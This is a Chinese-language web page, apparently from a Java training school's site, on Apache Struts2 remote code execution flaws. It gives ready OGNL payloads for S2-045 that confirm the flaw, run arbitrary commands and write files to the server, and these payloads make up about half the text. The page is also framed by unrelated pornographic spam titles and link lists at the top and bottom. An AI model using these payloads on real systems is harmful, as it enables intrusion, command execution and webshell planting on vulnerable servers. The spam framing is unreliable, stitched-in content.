大战熟女丰满人妻av-荡女精品导航-岛国aaaa级午夜福利片-岛国av动作片在线观看-岛国av无码免费无禁网站-岛国大片激情做爰视频

專注Java教育14年 全國咨詢/投訴熱線:400-8080-105
動力節點LOGO圖
始于2009,口口相傳的Java黃埔軍校
首頁 hot資訊 Struts2漏洞利用工具的檢查方法

Struts2漏洞利用工具的檢查方法

更新時間:2022-04-12 09:11:29 來源:動力節點 瀏覽3142次

Struts2是一個基于MVC設計模式的Web應用框架,但2存在遠程代碼執行的漏洞,動力節點小編認為,檢測出漏洞就要進行Struts2漏洞修復,現在Struts2漏洞檢測工具2017版增加S2-046,官方發布S2-046和S2-045漏洞引發原因一樣,只是利用漏洞的位置發生了變化,S2-046方式可能繞過部分WAF防護,存在S2-045就存在S2-046。

當Struts2開啟devMode模式時,將導致嚴重遠程代碼執行漏洞。如果WebService啟動權限為最高權限時,可遠程執行任意命令,包括關機、建立新用戶、以及刪除服務器上所有文件等等。

支持S2-057 CVE-2018-11776 、S2-048 CVE-2017-9791、S2-046 CVE-2017-5638、S2-045 CVE-2017-5638、S2-037 CVE-2016-4438、 S2-032 CVE-2016-3081 、S2-020 CVE-2014-0094 、S2-019 CVE-2013-4316等漏洞檢測!

Apache Struts2存在遠程代碼執行的高危漏洞(S2-057/CVE-2018-11776),該漏洞由Semmle Security Research team的安全研究員Man YueMo發現。該漏洞是由于在Struts2開發框架中使用namespace功能定義XML配置時,namespace值未被設置且在上層動作配置(Action Configuration)中未設置或用通配符namespace,可能導致遠程代碼執行。同理,url標簽未設置value和action值且上層動作未設置或用通配符namespace時也可能導致遠程代碼執行!

相關exp:

S2-045:

1.驗證漏洞,修改Content-Type,返回內容為“webpath”代表存在漏洞。

%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).

(#[email protected]@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('web')).

(#res.getWriter().print('path')).(#res.getWriter().flush()).(#res.getWriter().close())}

2.執行命令

%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).

(#[email protected]@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(#s=new java.util.Scanner((new

java.lang.ProcessBuilder('[cmd]'.toString().split('s'))).start().getInputStream()).useDelimiter('AAAA')).

(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).

(#res.getWriter().close()).(#s.close())}

3.上傳文件:

%{(#test='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).

(#_memberAccess?(#_memberAccess=#dm):

((#container=#context['com.opensymphony.xwork2.ActionContext.container']).

(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).

(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).

(#context.setMemberAccess(#dm)))).(#[email protected]@getRequest()).

(#[email protected]@getResponse()).

(#res.setContentType('text/html;charset=UTF-8')).(new java.io.BufferedWriter(new

java.io.FileWriter([path])).append(#req.getHeader('test')).close()).(#res.getWriter().print('oko')).

(#res.getWriter().print('kok/')).(#res.getWriter().print(#req.getContextPath())).(#res.getWriter().flush()).

(#res.getWriter().close())}

以上就是關于“Struts2漏洞利用工具的檢查方法”介紹,大家如果想了解更多相關知識,不妨來關注一下動力節點的Struts2視頻教程,里面的內容更加豐富,課程由淺到深,通俗易懂,適合沒有基礎的小伙伴學習,希望對大家能夠有所幫助。

提交申請后,顧問老師會電話與您溝通安排學習

免費課程推薦 >>
技術文檔推薦 >>
主站蜘蛛池模板: 久久天天躁狠狠躁夜夜2020一 | a级做爰片毛片视频 | 国产一区二区福利久久 | 久久精品大片 | 亚洲福利社| 国产在线五月综合婷婷 | 亚洲精品欧洲久久婷婷99 | 国产精品青草久久福利不卡 | 国产精品亚洲片在线牛牛影视 | 青草视频在线观看视频 | 4hu四虎最新免费地址 | 欧美熟a| 2021成人国产精品 | 四虎永久免费网站入口2020 | 亚洲精品美女在线观看 | 免费看一级毛片 | 天天操天天干天天爱 | 午夜免费福利影院 | 欧美视频在线观看 | 免费观看欧美一级毛片 | 国产成人精品午夜 | 亚洲国产激情在线一区 | 日本二区视频 | 亚洲图片综合网 | 国产永久视频 | 99精品国产在这里白浆 | 99久久免费观看 | 四虎影院中文字幕 | 国产在线欧美日韩一区二区 | 欧美一区永久视频免费观看 | 国产激情影院 | 国产精品国产三级国产 | 免费区欧美一级毛片精品 | 久久精品亚洲一区二区 | 日本高清在线精品一区二区三区 | 中文字幕亚洲综合久久 | 国产片网址 | 国产精品一区视频 | 国产小视频免费在线观看 | 香蕉国产人午夜视频在线 | 99精品国产费观看视频 |